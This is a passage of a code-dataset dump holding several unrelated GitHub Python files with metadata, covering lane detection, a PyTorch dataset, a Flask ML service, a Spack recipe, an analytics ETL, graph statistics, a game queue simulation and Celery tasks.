!\")","repo_name":"YolbarsZiya1997/My_Python_journy","sub_path":"Dictionaries/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"14638156095","text":"#Advanced Lane Lines\n#import statements\nimport numpy as np\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\nimport pickle\n\n\n#Calibrate Camera\n\n#prepare object points\nobjp = np.zeros((6*9,3), np.float32)\nobjp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n\n#Arrays to store object points and image points from all the images\nobjpoints = [] #3d points in real world space\nimgpoints = [] # 2d points in image plane\n\n#Make a list of calibration images\nimages = glob.glob('camera_cal/calibration*.jpg')\n\n#Step through the lsit and search for chessboard corners\nfor idx, fname in enumerate(images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #find corners\n ret, corners = cv2.findChessboardCorners(gray, (9,6), None)\n\n #If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n #Draw and display the corners\n cv2.drawChessboardCorners(img, (8,6), corners, ret)\n cv2.imshow('img', img)\n cv2.waitKey(500)\n\ncv2.destroyAllWindows()\n\n\ndef undistort(img, objpoints, imgpoints):\n '''\n undistorts and image\n input: image, list of objpoints, and list of imgpoints\n output: undistorted image\n '''\n img_size = (img.shape[1], img.shape[0])\n #print(img_size)\n\n #Do camera calibration give obj points and img points\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size, None, None)\n dst = cv2.undistort(img, mtx, dist, None, mtx)\n\n #visualize undistortion\n #visualizeUndistort(img, dst)\n #return undistorted image\n return dst\n\ndef visualizeUndistort(img, dst):\n f, (ax1, ax2) = plt.subplots(1,2, figsize = (20, 10))\n ax1.imshow(img)\n ax1.set_title('Original Image')\n ax2.imshow(dst)\n ax2.set_title('Undistorted Image')\n\n\n\n\n#Transform to birds eye view\ndef perspectiveTransform(img):\n '''\n updates a photo to make it bird's eye view\n input: Original image\n output: Transformed image\n '''\n offset = 100\n img_size = (img.shape[1], img.shape[0])\n\n #find source and destination points\n #####################################################\n src = np.float32([]) # find points from my mask?\n #####################################################\n dst = np.float32([[offset, offset], [img_size[0] - offset, offset], [img_size[0] - offset, img_size[1] - offset], [offset, img_size[1] - offset]]) \n #compute perspective transform, M\n M = cv2.getPerspectiveTransform(src, dst)\n #warp image\n warp = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n return warp\n \n\n#Sobel x plus S_gradient, put on mask\ndef thresholding(img, sobel_t_min = 20, sobel_t_max = 100, s_t_min = 170, s_t_max = 255):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)\n abs_sobelx = np.absolute(sobelx)\n scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))\n\n sxbinary = np.zeros_like(scaled_sobel)\n sxbinary[(scaled_sobel >= sobel_t_min) & (scaled_sobel <= sobel_t_max)] = 1\n\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n s_channel = hls[:,:,2]\n s_binary = np.seros_like(s_channel)\n s_binary[(s_channel >= s_t_min) & (s_channel <= s_t_max)] = 1\n\n #stack both to see the individual contributions. Green for Sobel, Blue for Saturation (HLS)\n color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255\n\n #combine the two thresholds\n combined_binary = np.zeros_like(sxbinary)\n combined_binary[(s_binary ==1) | (sxbinary ==1)] =1\n\n return combined_binary\n \n \n#Training for lines\n\n#Creating polyfit of left and right lanes\n\n#Calculating radius\n\n#Drawing line on image\n\n#Filling in area on image\n\n\n#work on lines and make sure that everything is set! compile this stuff and work on it on tuesday\n#try to find out how to plot out with matplot lib and idle\n#find out why my warp inverse doesnt work\n#find out how to install mpeg reader on work laptop to make it run\n","repo_name":"seanjahaupan/AdvancedLaneFinding","sub_path":"Project4.py","file_name":"Project4.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"765218155","text":"import os\nfrom torch.utils.data import Dataset\nimport torch\nimport random\nimport math\nfrom pathlib import Path\nimport json\nfrom torchvision import transforms\n\n\nclass ArtifiscoDataset(Dataset):\n def __init__(self, root, train_val_split=0.8, train=False):\n # with open(os.path.join(root, 'metadata.json')) as fp:\n # metadata = json.load(fp)\n\n self.files = list(Path(root).rglob('*.pth'))\n shuffle = random.Random(42).shuffle # Make sure to have reproducible shuffling\n shuffle(self.files)\n\n split_point = math.floor(len(self.files) * train_val_split)\n if train:\n self.files = self.files[:split_point]\n else:\n self.files = self.files[split_point:]\n\n # self.image_transforms = transforms.Compose([\n # transforms.ToPILImage(),\n # transforms.Resize((metadata['width_images'], metadata['height_images'])),\n # transforms.ToTensor(),\n # transforms.Normalize(metadata['mean_images'], metadata['std_images'])\n # ])\n #\n # self.spectrum_transforms = transforms.Normalize(metadata['mean_spectrums'], metadata['std_spectrums'])\n\n def __getitem__(self, index):\n data = torch.load(self.files[index])\n\n data['image'] = torch.stack([\n data['image'],\n data['image'],\n data['image']\n ], dim=0)\n\n data['spectrum'] = torch.stack([\n data['spectrum'],\n data['spectrum'],\n data['spectrum']\n ], dim=0)\n\n # data['image'] = self.image_transforms(data['image'])\n # data['spectrum'] = self.spectrum_transforms(data['spectrum'])\n return data\n\n def __len__(self):\n return len(self.files)\n","repo_name":"cemfi/artifisco","sub_path":"find_measure_in_audio/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12523622498","text":"from flask import Flask, request, jsonify\nfrom waitress import serve\nimport pandas as pd\nimport logging\nimport os\n\nfrom model_building.predictor import Predictor\nimport sequence_data_processing\n\n\n# ----------------------------------------------------------------------------\n# global definitions\n# ----------------------------------------------------------------------------\napp = Flask(__name__)\n\n# online path\ntrain_path = \"/amllibrary/train\"\npredict_path = \"/amllibrary/predict\"\n\n# exit codes\nNOT_FOUND = 404\nPOST_SUCCESS = 201\n\n# error messages\nerror_msg = {\n 404: \"ERROR: page not found\",\n 414: \"ERROR: missing mandatory input `configuration_file`\",\n 424: \"ERROR: missing mandatory input `regressor`\",\n 434: \"ERROR: either `config_file` or `df` must be provided\",\n 444: \"ERROR: both `config_file` and `df` provided --> ambiguous call\",\n 454: \"ERROR: aMLLibrary called `sys.exit`\"\n}\n\n# set basic logging level\nlogging.basicConfig(level=logging.INFO)\n\n\n# ----------------------------------------------------------------------------\n# train service\n# ----------------------------------------------------------------------------\n@app.route(train_path, methods=[\"POST\"])\ndef train():\n \"\"\"\n Starts training service\n\n Returns\n -------\n Message and key denoting the training outcome (success or failure)\n \"\"\"\n # get all data\n data = request.get_json()\n \n # check existence of mandatory fields:\n KEY_ERROR = 0\n if \"configuration_file\" not in data.keys():\n KEY_ERROR = 10\n else:\n # extract configuration parameters\n configuration_file = data[\"configuration_file\"]\n debug = data.get(\"debug\", False)\n output = data.get(\"output\", \"output\")\n j = data.get(\"j\", 1)\n details = data.get(\"details\", False)\n keep_temp = data.get(\"keep_temp\", False)\n\n # set logging level for debugging (if required)\n if debug:\n logging.getLogger().setLevel(logging.DEBUG)\n\n try:\n # train\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n processor = sequence_data_processing.SequenceDataProcessing(\n configuration_file, \n debug=debug, \n output=output, \n j=j, \n details=details, \n keep_temp=keep_temp\n )\n processor.process()\n\n # define output\n output = (\"DONE\", POST_SUCCESS)\n \n # define appropriate key error if the training module fails\n except SystemExit:\n KEY_ERROR = 50\n \n # if any key error is defined, return original data and error code\n if KEY_ERROR > 0:\n output = (error_msg[NOT_FOUND + KEY_ERROR], NOT_FOUND + KEY_ERROR)\n \n return jsonify(output[0]), output[1]\n\n\n\n# ----------------------------------------------------------------------------\n# predict service\n# ----------------------------------------------------------------------------\n@app.route(predict_path, methods=[\"POST\"])\ndef predict():\n \"\"\"\n Starts predict service\n\n Returns\n -------\n Message and key denoting the predict outcome (success or failure)\n The message contains the list of predicted values if the prediction is \n done on a dataframe instead of a file\n \"\"\"\n # get all data\n data = request.get_json()\n \n # check existence of mandatory fields:\n KEY_ERROR = 0\n if \"regressor\" not in data.keys():\n KEY_ERROR = 20\n elif (\"config_file\" not in data.keys()) and (\"df\" not in data.keys()):\n KEY_ERROR = 30\n elif (\"config_file\" in data.keys()) and (\"df\" in data.keys()):\n KEY_ERROR = 40\n else:\n # get configuration parameters\n regressor_file = data[\"regressor\"]\n config_file = data.get(\"config_file\", None)\n output_folder = data.get(\"output\", \"output_predict\")\n debug = data.get(\"debug\", False)\n mape_to_file = data.get(\"mape_to_file\", False)\n df = data.get(\"df\", None)\n\n # set logging level for debugging (if required)\n if debug:\n logging.getLogger().setLevel(logging.DEBUG)\n \n try:\n # initialize predictor\n predictor_obj = Predictor(\n regressor_file=regressor_file, \n output_folder=output_folder, \n debug=debug\n )\n\n # if configuration file is provided, perform prediction from file\n if \"config_file\" in data.keys():\n predictor_obj.predict(\n config_file=config_file, \n mape_to_file=mape_to_file\n )\n result = \"DONE\"\n else:\n # otherwise, perform prediction from dataframe\n yy = predictor_obj.predict_from_df(\n xx=pd.DataFrame(df),\n regressor_file=regressor_file\n )\n result = str(yy)\n \n # define output \n output = (result, POST_SUCCESS)\n \n # define appropriate key error if the training module fails\n except SystemExit:\n KEY_ERROR = 50\n \n # if any key error is defined, return original data and error code\n if KEY_ERROR > 0:\n output = (error_msg[NOT_FOUND + KEY_ERROR], NOT_FOUND + KEY_ERROR)\n \n return jsonify(output[0]), output[1]\n\n\n\n# ----------------------------------------------------------------------------\n# start\n# ----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n # app.run(debug=True, host=\"0.0.0.0\", port=8888)\n serve(app, host=\"0.0.0.0\", port=8888)\n","repo_name":"aMLLibrary/aMLLibrary","sub_path":"web_service.py","file_name":"web_service.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"1923629074","text":"from spack.package import *\n\n\nclass Xclipboard(AutotoolsPackage, XorgPackage):\n \"\"\"xclipboard is used to collect and display text selections that are\n sent to the CLIPBOARD by other clients. It is typically used to save\n CLIPBOARD selections for later use. It stores each CLIPBOARD\n selection as a separate string, each of which can be selected.\"\"\"\n\n homepage = \"https://cgit.freedesktop.org/xorg/app/xclipboard\"\n xorg_mirror_path = \"app/xclipboard-1.1.3.tar.gz\"\n\n version(\"1.1.4\", sha256=\"c40cb97f6c8597ba74a3de5c188d4429f686e4d395b85dac0ec8c7311bdf3d10\")\n version(\"1.1.3\", sha256=\"a8c335cf166cbb27ff86569503db7e639f85741ad199bfb3ba45dd0cfda3da7f\")\n\n depends_on(\"libxaw\")\n depends_on(\"libxmu\")\n depends_on(\"libxt@1.1:\")\n depends_on(\"libx11\")\n depends_on(\"libxkbfile\")\n\n depends_on(\"xproto@7.0.17:\")\n depends_on(\"pkgconfig\", type=\"build\")\n depends_on(\"util-macros\", type=\"build\")\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/xclipboard/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"23337909303","text":"from requester import Requester\nfrom dbconnector import Connector\nimport json\nimport datetime as dt\n\n\nclass Etl:\n\tdef __init__(self):\n\t\tself.req = Requester()\n\t\tself.connector = Connector()\n\n\tdef get_report_dictionary(self, report):\n\t\tcolumnHeader = report.get('columnHeader', {})\n\t\treturn {\n\t\t\t'columnHeader': columnHeader,\n\t\t\t'dimensionHeaders': columnHeader.get('dimensions', []),\n\t\t\t'metricHeaders': columnHeader.get('metricHeader', {}).get('metricHeaderEntries', []),\n\t\t\t'rows': report.get('data', {}).get('rows', [])\n\t\t}\n\n\tdef formatted_output(self, input):\n\t\tstats = []\n\t\tfor report in input.get('reports', []):\n\t\t\trdictionary = self.get_report_dictionary(report)\n\t\t\tfor row in rdictionary['rows']:\n\t\t\t\tstat = {}\n\t\t\t\tdimensions = row.get('dimensions', [])\n\t\t\t\tdateRangeValues = row.get('metrics', [])\n\t\t\t\tfor header, dimension in zip(rdictionary['dimensionHeaders'], dimensions):\n\t\t\t\t\thd = header.replace('ga:', '')\n\t\t\t\t\tif(hd == 'date'):\n\t\t\t\t\t\tdimension = dt.datetime.strptime(dimension, '%Y%m%d').strftime('%Y-%m-%d')\n\t\t\t\t\tstat[hd] = dimension\n\t\t\t\tfor i, values in enumerate(dateRangeValues):\n\t\t\t\t\tfor metricHeader, value in zip(rdictionary['metricHeaders'], values.get('values') ):\n\t\t\t\t\t\tstat[metricHeader.get('name').replace('ga:', '')] = value\n\t\t\t\tstats.append(stat) \n\t\treturn stats\n\n\tdef retrieve_all_stats(self, destroy_after=True):\n\t\tself.retrieve_hostname_stats(False)\n\t\tself.retrieve_city_stats(False)\n\t\tself.retrieve_region_stats(False)\n\t\tself.retrieve_devices_stats(False)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\n\tdef retrieve_hostname_stats(self, destroy_after=True):\n\t\tprint('getting hostname stats')\n\t\treport = self.req.get_hostname_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_hostname_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\tdef retrieve_city_stats(self, destroy_after=True):\n\t\tprint('getting city stats')\n\t\treport = self.req.get_city_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_city_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\tdef retrieve_region_stats(self, destroy_after=True):\n\t\tprint('getting region stats')\n\t\treport = self.req.get_region_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_region_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\tdef retrieve_devices_stats(self, destroy_after=True):\n\t\tprint('getting devices stats')\n\t\treport = self.req.get_devices_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_device_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\ndef main():\n\tetl = Etl()\n\tetl.retrieve_all_stats()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"scissorhands/pynal","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27403951986","text":"import multiprocessing as mp\nfrom networkx.generators.geometric import random_geometric_graph as rgg\nfrom networkx import adjacency_matrix as toMatrix\nimport sparse_specializer as sp\nimport numpy as np\n\ndef compare(trials,args=[],func=rgg):\n #this is creating a list of the sizes of equitable partitions that appear when the algorithm is run trials number of times.\n #exists because multiprocessing library requires a callable function to parallelize.\n if len(args)==0:\n raise ValueError('must contain required arguments')\n stuff = []\n for i in range(trials):\n stuff=stuff+[len(j) for j in sp.DirectedGraph(toMatrix(func(*args))).coloring().values()]\n return stuff\ndef probs(trials,engines=4,args=[],func=rgg):\n #This is the parallelized version.\n #trials is the number of graphs to create.\n #engines is the number of threads to use in parallelization\n #args is a list of the arguments for the function that is passed in. ORDER MATTERS\n pool = mp.Pool(engines)\n stuff = pool.apply(compare,args=[trials,args,func])\n return stuff\ndef compare_radius(r,n,trials):\n #returns a list of all communities generated in int(trials) trials. This is specifically for random geometric, and will likely be phased out\n stuff = []\n for i in range(trials):\n stuff = stuff + [len(j) for j in sp.DirectedGraph(toMatrix(rgg(n,r))).coloring().values()]\n return stuff\n\ndef prob_distr(r,n,trials,threads):\n #returns an empirical probability distribution of the likelihood of a community appearing\n #in a geometric graph with radius r and number of nodes n in trials number of trials.\n pool=mp.Pool(threads)\n stuff = pool.apply(compare_radius,args=[r,n,trials])\n vals,counts = np.unique(stuff,return_counts=True)\n total = 0\n distr=np.zeros(n)\n for i,j in zip(vals,counts):\n total+=i*j\n distr[i-1]=i*j\n return distr/total\n\n#In Progress\n#Scmirnov Distance\ndef Scmirnov(dist1,dist2):\n #these are both distributions with the same number of nodes\n #computes the Scmirnov distance between the distributions\n assert len(dist1) == len(dist2)\n return np.max(np.abs(np.array(dist1)-np.array(dist2)))\n\n#In Progress\n#set up \"L2\" distance between probability distributions by making community size x and probability y\ndef L2dist(dist1,dist2):\n assert len(dist1) == len(dist2)\n #first turn each distribution into a collection of x,y points\n dist1 = [(i,dist1[i]) for i in range(len(dist1))]\n dist2 = [(i,dist2[i]) for i in range(len(dist2))]\n dist1 = np.array(dist1)\n dist2 = np.array(dist2)\n #for each point in dist1, make a list of the distances between it and each point in dist2\n distances = np.array([[np.linalg.norm(i-j) for i in dist2] for j in dist1])\n return np.max(np.min(distances[distances > 0]))\n\n#making a kernel density estimator for a distribution.\n#an implementation using raw graphs\nfrom sklearn.neighbors import KernelDensity as KDE\n\ndef rawKDE(n,r,iterations,engines,kernel='gaussian',bandwidth=.3):\n #returns a KernelDensity object fitted to an average distribution style of equitable partitions.\n pool = mp.Pool(engines)\n stuff = pool.apply(compare_radius,args=[r,n,iterations])\n return KDE(kernel=kernel,bandwidth=bandwidth).fit(np.array(stuff).reshape(-1,1))\ndef toKDE(data,kernel='gaussian',bandwidth=.3):\n #data is a list of community sizes\n return KDE(kernel=kernel,bandwidth=bandwidth).fit(np.array(data).reshape(-1,1))\n\n\n\nfrom matplotlib import pyplot as plt\n\n\n#figure out how to plot a distribution using the kernel density estimator.\ndef plot(obj,n,res=None,label=None):\n #obj should be a KernelDensity object, pretrained on some data.\n #n is the number of nodes in the graph that the estimator was trained on, preferably, however, it is merely the x-axis.\n #res is the number of points to evaluate the pdf at.\n if res is None:\n res=n\n domain = np.linspace(0,n,res,endpoint=True)[:,np.newaxis]\n logs = obj.score_samples(domain)\n if label is None:\n plt.plot(domain,np.exp(logs))\n else:\n plt.plot(domain,np.exp(logs),label=label)\n return\n","repo_name":"EthanMWalker/NetworkSpecialization","sub_path":"probdist.py","file_name":"probdist.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16271785030","text":"import threading\r\nimport time\r\nfrom logs import *\r\n\r\nclass Partida:\r\n def __init__(self,capacidad,duracion,jugadores_cola,id_game):\r\n self.id_game = id_game\r\n self.partida_log = PartidaLog(obtener_juego(id_game).replace(\" \",\"\") + \".txt\")\r\n self.jugador_host = -1\r\n self.capacidad = capacidad\r\n self.duracion = duracion\r\n self.jugadores_cola = jugadores_cola\r\n self.threadLock = threading.Lock()\r\n self.statusLock = threading.Lock()\r\n self.queueSemaphore = threading.Semaphore(jugadores_cola)\r\n self.en_partida = list()\r\n self.cola = list()\r\n self.status = True\r\n\r\n def in_game(self,jugador,pos):\r\n self.statusLock.acquire()\r\n if (self.jugador_host == -1 and len(self.en_partida) == self.capacidad) or (self.jugador_host == -1 and len(self.cola) == 0 and len(self.en_partida[pos][2]) == 0):\r\n self.jugador_host = jugador\r\n self.statusLock.release()\r\n if self.jugador_host == jugador:\r\n print(\"Inicio de partida\")\r\n time.sleep(self.duracion)\r\n for j,s,_ in self.en_partida:\r\n if j != self.jugador_host:\r\n s.release()\r\n self.jugador_host = -1\r\n self.threadLock.acquire()\r\n self.en_partida = list()\r\n if len(self.cola) > 0:\r\n self.cola[0][1].release()\r\n self.threadLock.release()\r\n else:\r\n self.en_partida[pos][1].acquire()\r\n salida_log.registrar(jugador,salida_log.obtener_tiempo())\r\n print(jugador,\"Saliendo\")\r\n\r\n def entrar_en_cola(self,jugador,queue,entrada):\r\n\r\n print(jugador,\"Esperando que exista espacio en cola\")\r\n self.queueSemaphore.acquire()\r\n queue.pop(0)\r\n lobby_log.registrar(jugador,self.id_game,entrada,lobby_log.obtener_tiempo())\r\n if len(queue) > 0:\r\n queue[0][1].release()\r\n self.status = True\r\n else:\r\n self.status = False\r\n\r\n self.threadLock.acquire()\r\n semaphore = threading.Semaphore(0)\r\n self.cola.append((jugador,semaphore,queue))\r\n entrada = self.partida_log.obtener_tiempo()\r\n print(jugador,\"Ingresando a la cola\")\r\n while len(self.en_partida) >= self.capacidad or self.cola[0][0] != jugador:\r\n self.threadLock.release()\r\n semaphore.acquire()\r\n self.threadLock.acquire()\r\n self.cola.pop(0)\r\n pos = len(self.en_partida)\r\n self.en_partida.append((jugador,semaphore,queue))\r\n self.partida_log.registrar(jugador,entrada,self.partida_log.obtener_tiempo())\r\n if len(self.cola) > 0:\r\n self.cola[0][1].release()\r\n self.status = True\r\n self.threadLock.release()\r\n self.queueSemaphore.release()\r\n print(jugador,\"Esperando que se inicie la partida\")\r\n self.in_game(jugador,pos)\r\n\r\n\r\nEstandar = Partida(15,7,7,1)\r\nVersus = Partida(2,3,4,2)\r\nRapida = Partida(10,6,8,3)\r\nNavidad = Partida(12,5,10,4)","repo_name":"CharlesLakes/lab-so","sub_path":"tarea4/partida.py","file_name":"partida.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24854041649","text":"'''\n\n 1) Avoiding ORM\n\n 2) Database request templates for writing and reading\n\n'''\n\n\nclass ControlDb:\n def __init__(self, table_name='rate'):\n self.table = table_name\n self.upload_template = \"\"\"insert into {table_}\n values{vals}\n ON CONFLICT (cur1, cur2)\n DO UPDATE SET\n uploadtime = EXCLUDED.uploadtime,\n rate = EXCLUDED.rate;\"\"\"\n\n self.request_tempelate = \"\"\"select * from {table_};\"\"\"\n\n def upsert_request(self, data):\n v = ([\"('{}', '{}', {}, to_timestamp({}))\".format(*i) for i in data])\n v = ','.join(v)\n return self.upload_template.format(table_=self.table, vals=v)\n\n def select_request(self):\n return self.request_tempelate.format(table_=self.table)\n","repo_name":"vbaryshev4/faster_python","sub_path":"homework/11/Provider/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"41623967018","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef split (dataset, training_ratio):\r\n n = len (dataset) # Size of dataset\r\n r = int (training_ratio * n) # No. of training examples\r\n np.random.shuffle (dataset) # Shuffling the dataset\r\n return dataset[:r,:], dataset[r:,:]\r\n\r\ndef train (train_data):\r\n n = len (train_data) # Size of training dataset\r\n # Split the data and flatten the numpy arrays\r\n x, y = np.ravel (train_data[:,:1]), np.ravel (train_data[:,1:])\r\n # Plot the training dataset\r\n plt.scatter (x, y, color = \"blue\", s = 1, label = 'Train data')\r\n # Calculate mean, variance and covariance\r\n mean_x = np.sum(x) / n\r\n mean_y = np.sum(y) / n\r\n covariance_x_y = (1/n) * np.sum(x*y) - mean_x * mean_y \r\n var_x = (1/n) * np.sum(x*x) - mean_x * mean_x \r\n # y(bar) = a * x(bar) + b\r\n a = covariance_x_y / var_x\r\n b = mean_y - a * mean_x\r\n return a, b\r\n \r\ndef test (test_data, coefficients):\r\n n = len (test_data) # Size of testing dataset\r\n a, b = coefficients[0], coefficients[1]\r\n # Split the data and flatten the numpy arrays\r\n x, y = np.ravel (test_data[:,:1]), np.ravel (test_data[:,1:])\r\n # Plot the testing dataset\r\n plt.scatter (x, y, color = \"red\", s = 1, label = 'Test data')\r\n # Display the test results\r\n p = 10; # No. of decimal places\r\n print (\"X\\t\\tY\\t\\tY(Predicted)\");\r\n print (\"______________________________________________\");\r\n for i in range (n):\r\n y_pred = a * x[i] + b\r\n print (str(round(x[i],p)) + \"\\t\" + str(round(y[i],p)) + \"\\t\" + str(round(y_pred,p)))\r\n print (\"______________________________________________\");\r\n \r\ndef plot_regression_line (dataset, coefficients):\r\n a, b = coefficients[0], coefficients[1]\r\n # Split the data and flatten the numpy arrays\r\n x, y = np.ravel (dataset[:,:1]), np.ravel (dataset[:,1:])\r\n y_pred = a * x + b\r\n # Plot the regression line\r\n plt.plot (x, y_pred, color = \"green\")\r\n plt.xlabel ('X')\r\n plt.ylabel ('Y')\r\n plt.legend (loc = 'lower right')\r\n plt.title (\"Linear Regression Model\")\r\n plt.savefig ('output_plot.png', dpi=400)\r\n \r\ndef main ():\r\n # Read the csv file\r\n dataset = pd.read_csv ('Linear_Regression_Data_1D.csv').to_numpy()\r\n # Split the data set\r\n train_data, test_data = split (dataset, 0.8)\r\n # Train the data\r\n coefficients = train (train_data)\r\n # Test the data\r\n test (test_data, coefficients)\r\n # Plot the data\r\n plot_regression_line (dataset, coefficients)\r\n \r\nmain()","repo_name":"rv619/Machine-Learning","sub_path":"1D_Linear_Regression/linear_reg_1D.py","file_name":"linear_reg_1D.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"70367586156","text":"from math import sqrt\nfrom typing import Union, Tuple, List\n\nNumber = Union[int, float]\nPoint = Tuple[Number, Number]\n\n\ndef clamp(val, minimum, maximum):\n return max(min(maximum, val), minimum)\n\n\ndef distance(point_1: Point, point_2: Point) -> float:\n x1, y1 = point_1\n x2, y2 = point_2\n\n return sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n\n\ndef distances(points: List[Point]) -> List[float]:\n paired_points = zip(points, points[1:] + points[:1])\n return [distance(*pair) for pair in paired_points]\n\n\ndef lerp(x1: Number, x2: Number, w: Number) -> Number:\n return w * x1 + (1 - w) * x2\n\n\ndef lerp2D(p1: Point, p2: Point, w: Number) -> Point:\n x1, y1 = p1\n x2, y2 = p2\n return (lerp(x1, x2, w), lerp(y1, y2, w))\n\n\ndef incomplete_perimeter_points(points: List[Point], weight: float) -> List[Point]:\n all_distances = distances(points)\n total_perimeter = sum(all_distances)\n\n covered_distance = weight * total_perimeter\n final_points = [points[0]]\n\n previous_point = points[0]\n for point, distance in zip(points[1:] + points[:1], all_distances):\n covered_distance -= distance\n if covered_distance >= 0:\n final_points.append(point)\n previous_point = point\n continue\n weight = abs(covered_distance / distance)\n final_points.append(lerp2D(previous_point, point, weight))\n break\n\n return final_points\n","repo_name":"b34nst4lk/tetris.py","sub_path":"utils/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12523463788","text":"import sys\nimport warnings\n\nimport numpy as np\n\nimport data_preparation.data_preparation\n\n\nclass Logarithm(data_preparation.data_preparation.DataPreparation):\n \"\"\"\n Step adds new columns obtained by taking the natural logarithm of values in existing columns\n\n The set of columns to be transformed is listed in option \"log\" of \"DataPreparation\" section in campaign configuration.\n The name of the new columns is the name of the old columns with \"log_\" as prefix\n Original columns remain part of the input dataset\n\n Methods\n -------\n get_name()\n Return the name of this step\n\n process()\n Take logarithms of the specified columns\n \"\"\"\n\n def get_name(self):\n \"\"\"\n Return \"Logarithm\"\n\n Returns\n string\n The name of this step\n \"\"\"\n return \"Logarithm\"\n\n def process(self, inputs):\n \"\"\"\n Main method of the class which performs the actual computation\n\n Parameters\n ----------\n inputs: RegressionInputs\n The data to be analyzed\n \"\"\"\n warnings.filterwarnings('error')\n np.seterr(all='warn')\n outputs = inputs\n\n to_be_logd_list = self._campaign_configuration['DataPreparation']['log']\n if to_be_logd_list == \"[*]\":\n to_be_logd_list = inputs.x_columns.copy()\n\n for column in to_be_logd_list:\n if inputs.data[column].dtype == bool:\n self._logger.debug(\"Skipping logarithm of boolean-valued column: %s\", column)\n continue\n if inputs.data[column].dtype == object:\n self._logger.error(\"Trying to take logarithm of a string column: %s\", column)\n sys.exit(-1)\n if any(inputs.data[column] <= 0):\n self._logger.error(\"Trying to take logarithm of non-positive value in column %s\", column)\n sys.exit(-1)\n try:\n new_column = np.log(inputs.data[column])\n except Warning:\n self._logger.error(\"Error in computing logarithm of %s\", column)\n sys.exit(1)\n new_feature_name = 'log_' + column\n outputs.data[new_feature_name] = new_column\n outputs.x_columns.append(new_feature_name)\n\n return outputs\n","repo_name":"aMLLibrary/aMLLibrary","sub_path":"data_preparation/logarithm.py","file_name":"logarithm.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"21592104684","text":"from celery import shared_task\nfrom bson import ObjectId\nfrom database.database import connection\nimport json\nfrom datetime import datetime, timedelta\nimport requests\nimport requests\nfrom bson import json_util\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='User:Create New Conversation.')\ndef savingChat(self,data):\n database,client = connection()\n try:\n database[\"conversations\"].insert_one(data)\n except Exception as e:\n print(\"Exception here :\",e)\n pass\n client.close()\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='User:Get All Conversation.')\ndef GetAllChat(self):\n database,client = connection()\n try:\n data=database[\"conversations\"].find({},{'_id': 0})\n data = json_util.dumps(data)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n return 